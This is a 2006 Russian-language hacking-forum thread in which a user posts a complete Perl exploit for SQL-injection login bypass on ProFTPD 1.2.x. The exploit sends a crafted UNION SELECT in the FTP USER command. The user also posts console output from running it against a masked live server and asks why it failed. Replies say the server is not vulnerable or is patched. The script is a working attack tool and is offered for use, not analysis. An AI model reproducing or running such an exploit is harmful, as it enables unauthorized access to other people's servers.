Что я делаю не так?

Discussion in 'Уязвимости' started by ProblemaT2, 3 Apr 2006.

  1. ProblemaT2

    ProblemaT2 New Member

    Joined:
    31 Mar 2006
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Неавторизованный доступ ProFTPD 1.2.*

    Вот сплойт:
    HTML:
    #!/usr/bin/perl
    # Origin: runlevel [ [email protected] ] Spain, 2003
    # Updated by Sawasoft and Dr. Trunk Latvia, 2003
    # Working source! Have fun, scriptkiddiez!
    
         use IO::Socket;
    if(@ARGV<2)
    {
    #     print "\nProof Of Concept Sql Inject on ProFTPD\n";
    #     print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n";
            print "DZJAAAAAAAA \n\n\n";
    #     exit(0);
    };
    
    $server = $ARGV[0];
    $query = $ARGV[1];
    $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1)
    or die "Can't connect. \n";
    
    if(defined($line=<$remote>))
    {
         print STDOUT $line;
    if($query eq "1")
    {
         print $remote "USER ')UNION SELECT'u','p',1001,1001,'/tmp','/bin/bash'WHERE(''='\n";
    }
    else
    {
         print $remote "USER ')UNION SELECT'u','p',1001,1001,'/bin/bash' WHERE(''='\n";
    };
    
    if(defined($line=<$remote>))
    {
         print STDOUT $line;
         print $remote "PASS p\n";
    
    if(defined($line=<$remote>))
    {
         print STDOUT $line;
         print "Sent query to $ARGV[0]\n";
    
    if($line =~ /230/)
    {
         print "[------- Sql Inject Able \n";
    }
    else
    {
         print "[------- Sql Inject Unable \n";
    };
    };
    };
    };
    
    close $remote;
    C:\Perl\bin>perl C:\Perl\ftp.pl ***.**.**.**
    DZJAAAAAAAA


    220 ProFTPD 1.2.10 Server (ProFTPD) [***.**.**.**]
    331 Password required for ')UNION.
    530 Login incorrect.
    Sent query to ***.**.**.**
    [------- Sql Inject Unable

    Вот что получаеться
     
    #1 ProblemaT2, 3 Apr 2006
    Last edited: 3 Apr 2006
  2. Deem3n®

    Deem3n® RTFMSDN

    Joined:
    19 Sep 2005
    Messages:
    378
    Likes Received:
    153
    Reputations:
    164
    чего непонятного?
    Sql Inject Unable
     
  3. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    а ЕСЛИ ПО РУССКИ ТО БАГИ ТАМ НЕТУ! И ОН ТЕБЯ ПОСЫЛАЕТ!!!
     
  4. Mobile

    Mobile Elder - Старейшина

    Joined:
    18 Feb 2006
    Messages:
    1,089
    Likes Received:
    822
    Reputations:
    324
    Тема названа туповато...
     
  5. ProblemaT2

    ProblemaT2 New Member

    Joined:
    31 Mar 2006
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Всё понятно.

    Просто версия на серваке ProFTPD 1.2.10, по идее уязвимая вот я иподумал что чото не так делаю...
    Ещё вот это смущает
    HTML:
    530 Login incorrect
     
    #5 ProblemaT2, 3 Apr 2006
    Last edited: 3 Apr 2006
  6. limpompo

    limpompo Новичок

    Joined:
    27 Aug 2005
    Messages:
    1,402
    Likes Received:
    308
    Reputations:
    453
    гы значит пропатчена!